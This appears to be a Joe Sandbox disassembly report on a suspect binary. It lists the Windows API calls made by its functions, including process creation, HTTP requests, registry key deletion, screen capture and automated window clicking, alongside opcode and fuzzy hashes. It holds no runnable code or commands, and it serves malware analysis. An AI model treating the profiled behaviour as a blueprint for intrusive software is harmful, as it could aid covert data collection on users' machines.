                            • Part of subcall function 007705A7: GetStdHandle.KERNEL32(000000F6), ref: 007705C6
                          • _wcslen.LIBCMT ref: 0078B34B
                          • _wcslen.LIBCMT ref: 0078B366
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0078B3B6
                          • GetLastError.KERNEL32(00000000), ref: 0078B407
                          • CloseHandle.KERNEL32(?), ref: 0078B439
                          • CloseHandle.KERNEL32(00000000), ref: 0078B44A
                          • CloseHandle.KERNEL32(00000000), ref: 0078B45C
                          • CloseHandle.KERNEL32(00000000), ref: 0078B46E
                          • CloseHandle.KERNEL32(?), ref: 0078B4E3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                          • String ID:
                          • API String ID: 2178637699-0
                          • Opcode ID: fefa5845b1c792ef8d50a733a4648c222d6e94cede232f74738443ef1975bfaa
                          • Instruction ID: 7470f8141705f2fb7a46a0a2be684f1efc459676f89c690714f24b9474647ef0
                          • Opcode Fuzzy Hash: fefa5845b1c792ef8d50a733a4648c222d6e94cede232f74738443ef1975bfaa
                          • Instruction Fuzzy Hash: 94F19C31608340DFCB14EF24C895B6EBBE5AF85314F18855DF8999B2A2CB39EC45CB52
                          APIs
                          • GetMenuItemCount.USER32(007D1990), ref: 00742F8D
                          • GetMenuItemCount.USER32(007D1990), ref: 0074303D
                          • GetCursorPos.USER32(?), ref: 00743081
                          • SetForegroundWindow.USER32(00000000), ref: 0074308A
                          • TrackPopupMenuEx.USER32(007D1990,00000000,?,00000000,00000000,00000000), ref: 0074309D
                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007430A9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                          • String ID: 0
                          • API String ID: 36266755-4108050209
                          • Opcode ID: d4d415eb7e881549eb0b5a9346c277b3f249248a7d94180183b649239a77cad0
                          • Instruction ID: 1e8243fcb240387636556c92daba3e0b8b03affd4b1dbaf9f87defab7c7f8970
                          • Opcode Fuzzy Hash: d4d415eb7e881549eb0b5a9346c277b3f249248a7d94180183b649239a77cad0
                          • Instruction Fuzzy Hash: F7712931640215FFEB218F24CC49FAABFA9FF05324F204206F529A61E1C7B9A965C750
                          APIs
                          • DestroyWindow.USER32(?,?), ref: 00796DEB
                            • Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00796E5F
                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00796E81
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00796E94
                          • DestroyWindow.USER32(?), ref: 00796EB5
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00700000,00000000), ref: 00796EE4
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00796EFD
                          • GetDesktopWindow.USER32 ref: 00796F16
                          • GetWindowRect.USER32(00000000), ref: 00796F1D
                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00796F35
                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00796F4D
                            • Part of subcall function 00719944: GetWindowLongW.USER32(?,000000EB), ref: 00719952
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                          • String ID: 0$tooltips_class32
                          • API String ID: 2429346358-3619404913
                          • Opcode ID: b45aa606acac7e3a252b9320791398d04348a04808b1fde4f534798ce7c57160
                          • Instruction ID: 1572c0ef118eb5a285e53ef361a54d8370cce0199a4ec013bb63fcfcbf5c1183
                          • Opcode Fuzzy Hash: b45aa606acac7e3a252b9320791398d04348a04808b1fde4f534798ce7c57160
                          • Instruction Fuzzy Hash: CE7167B0104240AFDB21CF18E858FBABBF9FB89304F44465EF98997261C778E906CB15
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0077C4B0
                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0077C4C3
                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0077C4D7
                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0077C4F0
                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0077C533
                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0077C549
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0077C554
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0077C584
                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0077C5DC
                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0077C5F0
                          • InternetCloseHandle.WININET(00000000), ref: 0077C5FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                          • String ID:
                          • API String ID: 3800310941-3916222277
                          • Opcode ID: 19425f8b0a1f7e432b25c5353f64a1ba555c62f88a8478d5aa838ca957ba3ed0
                          • Instruction ID: d1b05852f069b79d8451eff984867a62f3351fae221299eba7f4709a6c118e18
                          • Opcode Fuzzy Hash: 19425f8b0a1f7e432b25c5353f64a1ba555c62f88a8478d5aa838ca957ba3ed0
                          • Instruction Fuzzy Hash: 8C514DB1500604BFDF228FA0C988AAB7BBCFF08794F10841EF94996210DB39E9559B60
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00798592
                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985A2
                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985AD
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985BA
                          • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985C8
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985D7
                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985E0
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985E7
                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985F8
                          • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0079FC38,?), ref: 00798611
                          • GlobalFree.KERNEL32(00000000), ref: 00798621
                          • GetObjectW.GDI32(?,00000018,?), ref: 00798641
                          • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00798671
                          • DeleteObject.GDI32(?), ref: 00798699
                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007986AF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                          • String ID:
                          • API String ID: 3840717409-0
                          • Opcode ID: db6dfeabde939d8df8a536772c323d0b3b387bcffb66ffdcee87cf4e19724e5e
                          • Instruction ID: a6cea2f631b3ce83ee15345142d163e559fcc4a50b0823364b32050d84cfc77e
                          • Opcode Fuzzy Hash: db6dfeabde939d8df8a536772c323d0b3b387bcffb66ffdcee87cf4e19724e5e
                          • Instruction Fuzzy Hash: A2410C75600208AFDF11DFA5DD48EAA7BB8FF89711F108059F905EB260DB789D02CB65
                          APIs
                          • VariantInit.OLEAUT32(00000000), ref: 00771502
                          • VariantCopy.OLEAUT32(?,?), ref: 0077150B
                          • VariantClear.OLEAUT32(?), ref: 00771517
                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007715FB
                          • VarR8FromDec.OLEAUT32(?,?), ref: 00771657
                          • VariantInit.OLEAUT32(?), ref: 00771708
                          • SysFreeString.OLEAUT32(?), ref: 0077178C
                          • VariantClear.OLEAUT32(?), ref: 007717D8
                          • VariantClear.OLEAUT32(?), ref: 007717E7
                          • VariantInit.OLEAUT32(00000000), ref: 00771823
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                          • API String ID: 1234038744-3931177956
                          • Opcode ID: ea58d137bab166ad938f5d43e620c2d0e939244550c7a00a2f5fdeea1b6cfe03
                          • Instruction ID: 7dbaf52b4649bfecd505218bb8d9f5b68141c217175d5a4afe10b4df68e03e1f
                          • Opcode Fuzzy Hash: ea58d137bab166ad938f5d43e620c2d0e939244550c7a00a2f5fdeea1b6cfe03
                          • Instruction Fuzzy Hash: 68D11471A00105EBDF089F68D889BBDB7B5BF44740F94C156E44AAB180DB3CEC51DBA1
                          APIs
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                            • Part of subcall function 0078C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0078B6AE,?,?), ref: 0078C9B5
                            • Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078C9F1
                            • Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078CA68
                            • Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078CA9E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0078B6F4
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0078B772
                          • RegDeleteValueW.ADVAPI32(?,?), ref: 0078B80A
                          • RegCloseKey.ADVAPI32(?), ref: 0078B87E
                          • RegCloseKey.ADVAPI32(?), ref: 0078B89C
                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0078B8F2
                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0078B904
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 0078B922
                          • FreeLibrary.KERNEL32(00000000), ref: 0078B983
                          • RegCloseKey.ADVAPI32(00000000), ref: 0078B994
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                          • String ID: RegDeleteKeyExW$advapi32.dll
                          • API String ID: 146587525-4033151799
                          • Opcode ID: 9fee26faecc1e18bd0e7302e9ab2a5cffbd751975a048df93b43b084da761fee
                          • Instruction ID: 0148b5582770374f6c4bb02ea3601283a4afbd54c0601012714159169ca38a8a
                          • Opcode Fuzzy Hash: 9fee26faecc1e18bd0e7302e9ab2a5cffbd751975a048df93b43b084da761fee
                          • Instruction Fuzzy Hash: 4CC18E71204201EFD715EF14C499F2ABBE5BF84318F14859DF59A8B2A2CB39EC45CB91
                          APIs
                          • GetDC.USER32(00000000), ref: 007825D8
                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 007825E8
                          • CreateCompatibleDC.GDI32(?), ref: 007825F4
                          • SelectObject.GDI32(00000000,?), ref: 00782601
                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0078266D
                          • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 007826AC
                          • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 007826D0
                          • SelectObject.GDI32(?,?), ref: 007826D8
                          • DeleteObject.GDI32(?), ref: 007826E1
                          • DeleteDC.GDI32(?), ref: 007826E8
                          • ReleaseDC.USER32(00000000,?), ref: 007826F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                          • String ID: (
                          • API String ID: 2598888154-3887548279
                          • Opcode ID: 4b4f99b6ed4fe38feb49aa0b1fc78c0ddb5da5aa99615e6b5b4cb38eb11a2489
                          • Instruction ID: d5461daa8f1232261d388313615f24ab28ca4edc37d956c031a5d1f234ebee7a
                          • Opcode Fuzzy Hash: 4b4f99b6ed4fe38feb49aa0b1fc78c0ddb5da5aa99615e6b5b4cb38eb11a2489
                          • Instruction Fuzzy Hash: 526115B5D00209EFCF05DFA8D884AAEBBB5FF48310F20841AE555A7250E734A941CF64
                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 0073DAA1
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D659
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D66B
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D67D
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D68F
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D6A1
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D6B3
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D6C5
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D6D7
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D6E9
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D6FB
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D70D
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D71F
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D731
                          • _free.LIBCMT ref: 0073DA96
                            • Part of subcall function 007329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000), ref: 007329DE
                            • Part of subcall function 007329C8: GetLastError.KERNEL32(00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000,00000000), ref: 007329F0
                          • _free.LIBCMT ref: 0073DAB8
                          • _free.LIBCMT ref: 0073DACD
                          • _free.LIBCMT ref: 0073DAD8
                          • _free.LIBCMT ref: 0073DAFA
                          • _free.LIBCMT ref: 0073DB0D
                          • _free.LIBCMT ref: 0073DB1B
                          • _free.LIBCMT ref: 0073DB26
                          • _free.LIBCMT ref: 0073DB5E
                          • _free.LIBCMT ref: 0073DB65
                          • _free.LIBCMT ref: 0073DB82
                          • _free.LIBCMT ref: 0073DB9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID:
                          • API String ID: 161543041-0
                          • Opcode ID: ba22e2253fd9043e17e20f629915dec01e6f329c80ec3ff74eae4f6cf254c7d2
                          • Instruction ID: 581bc6993fab5e6032b419e8dd6a50ca15eaebf048ff3206e75da2e0766ac547
                          • Opcode Fuzzy Hash: ba22e2253fd9043e17e20f629915dec01e6f329c80ec3ff74eae4f6cf254c7d2
                          • Instruction Fuzzy Hash: 2B314C72604205DFFB32AA79F849B56B7E9FF00310F154469E499E71A3DB39BC418B20
                          APIs
                          • GetClassNameW.USER32(?,?,00000100), ref: 0076369C
                          • _wcslen.LIBCMT ref: 007636A7
                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00763797
                          • GetClassNameW.USER32(?,?,00000400), ref: 0076380C
                          • GetDlgCtrlID.USER32(?), ref: 0076385D
                          • GetWindowRect.USER32(?,?), ref: 00763882
                          • GetParent.USER32(?), ref: 007638A0
                          • ScreenToClient.USER32(00000000), ref: 007638A7
                          • GetClassNameW.USER32(?,?,00000100), ref: 00763921
                          • GetWindowTextW.USER32(?,?,00000400), ref: 0076395D
                          Similarity
                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                          • String ID: %s%u
                          • API String ID: 4010501982-679674701
                          • Opcode ID: 5eaab1790170c02f8077d176cce1f3e3876a9e65615a508fdebacb44d40888ff
                          • Instruction ID: 88a184ffba92ce7d8498f8a033e4ef677703a80fa32b6a6d574f5d1ca037d8eb
                          • Opcode Fuzzy Hash: 5eaab1790170c02f8077d176cce1f3e3876a9e65615a508fdebacb44d40888ff
                          • Instruction Fuzzy Hash: FF919371204706EFD719DF24C885BEAB7A8FF44354F008619FD9AD2190DB38EA55CBA1
                          APIs
                          • GetClassNameW.USER32(?,?,00000400), ref: 00764994
                          • GetWindowTextW.USER32(?,?,00000400), ref: 007649DA
                          • _wcslen.LIBCMT ref: 007649EB
                          • CharUpperBuffW.USER32(?,00000000), ref: 007649F7
                          • _wcsstr.LIBVCRUNTIME ref: 00764A2C
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00764A64
                          • GetWindowTextW.USER32(?,?,00000400), ref: 00764A9D
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00764AE6
                          • GetClassNameW.USER32(?,?,00000400), ref: 00764B20
                          • GetWindowRect.USER32(?,?), ref: 00764B8B
                          Similarity
                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                          • String ID: ThumbnailClass
                          • API String ID: 1311036022-1241985126
                          • Opcode ID: 7ad4d749dc0c4046a8bca27b1017e0a28f047682d8e6eb4ab952541f2177672b
                          • Instruction ID: 86d03eebc15da39a27ca0d35f02c1b3e2959f3b8b00e676283d390ba39f4837d
                          • Opcode Fuzzy Hash: 7ad4d749dc0c4046a8bca27b1017e0a28f047682d8e6eb4ab952541f2177672b
                          • Instruction Fuzzy Hash: 6391BC71004205EFDB05DF14C989FAA77E8FF84314F04846AFD8A9A196DB38ED46CBA1
                          APIs
                            • Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2
                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00798D5A
                          • GetFocus.USER32 ref: 00798D6A
                          • GetDlgCtrlID.USER32(00000000), ref: 00798D75
                          • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00798E1D
                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00798ECF
                          • GetMenuItemCount.USER32(?), ref: 00798EEC
                          • GetMenuItemID.USER32(?,00000000), ref: 00798EFC
                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00798F2E
                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00798F70
                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00798FA1
                          Similarity
                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                          • String ID: 0
                          • API String ID: 1026556194-4108050209
                          • Opcode ID: 3cf1328476bef059254a96c896449a72009738f849412a114c0942bc1c694d02
                          • Instruction ID: 456dc8fa632b2a797d6d7bf599bca3e5dae6328016d4f95f78b4bf7037b6b62b
                          • Opcode Fuzzy Hash: 3cf1328476bef059254a96c896449a72009738f849412a114c0942bc1c694d02
                          • Instruction Fuzzy Hash: 6681E271508301AFDF51CF24E888EAB7BEAFB8A314F14051EF99597291DB38D901CB62
                          APIs
                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0076DC20
                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0076DC46
                          • _wcslen.LIBCMT ref: 0076DC50
                          • _wcsstr.LIBVCRUNTIME ref: 0076DCA0
                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0076DCBC
                          Similarity
                          • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                          • API String ID: 1939486746-1459072770
                          • Opcode ID: d37117a6b7c185f2f1a371b851b292eaa9d722b8c433010899fd7ecd40fe3caa
                          • Instruction ID: 7a8a1816c15e08d22dd42b023ad66f3ba20c6409ca25fbe0d9801f5dd6c6d5bb
                          • Opcode Fuzzy Hash: d37117a6b7c185f2f1a371b851b292eaa9d722b8c433010899fd7ecd40fe3caa
                          • Instruction Fuzzy Hash: F641F6B2A40215BADB21A774AC4BEFF77ACEF45710F14406AF901A61C2EB7C9D0186A4
                          APIs
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0078CC64
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0078CC8D
                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0078CD48
                            • Part of subcall function 0078CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0078CCAA
                            • Part of subcall function 0078CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0078CCBD
                            • Part of subcall function 0078CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0078CCCF
                            • Part of subcall function 0078CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0078CD05
                            • Part of subcall function 0078CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0078CD28
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 0078CCF3
                          Similarity
                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                          • String ID: RegDeleteKeyExW$advapi32.dll
                          • API String ID: 2734957052-4033151799
                          • Opcode ID: 7a634c5ab9a05a98cc622751e8e5a5b459dd47d986792532cb47ed055b803af5
                          • Instruction ID: 111760810ec4e6fa4a6a6e7e516eef06427ae2230743fde3b58bfa0734241d79
                          • Opcode Fuzzy Hash: 7a634c5ab9a05a98cc622751e8e5a5b459dd47d986792532cb47ed055b803af5
                          • Instruction Fuzzy Hash: 663180B1A41128BBDB22AB55DC88EFFBB7CEF05740F004166A905E7140DA389A46DBB4
                          APIs
                          • timeGetTime.WINMM ref: 0076E6B4
                            • Part of subcall function 0071E551: timeGetTime.WINMM(?,?,0076E6D4), ref: 0071E555
                          • Sleep.KERNEL32(0000000A), ref: 0076E6E1
                          • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0076E705
                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0076E727
                          • SetActiveWindow.USER32 ref: 0076E746
                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0076E754
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0076E773
                          • Sleep.KERNEL32(000000FA), ref: 0076E77E
                          • IsWindow.USER32 ref: 0076E78A
                          • EndDialog.USER32(00000000), ref: 0076E79B
                          Similarity
                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                          • String ID: BUTTON
                          • API String ID: 1194449130-3405671355
                          • Opcode ID: 19437b723f9e7415a491e68c19b8597da75905dfbded1df828c175617b7f345b
                          • Instruction ID: 86521310e75472d10a3aacb3a94c598b13e2291801384432592317a5c0d57fbe
                          • Opcode Fuzzy Hash: 19437b723f9e7415a491e68c19b8597da75905dfbded1df828c175617b7f345b
                          • Instruction Fuzzy Hash: 022181B5241304AFEF025F64EC89A253B79FB64748B10C426F902825A2DB7DAC16DB3C
                          APIs
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
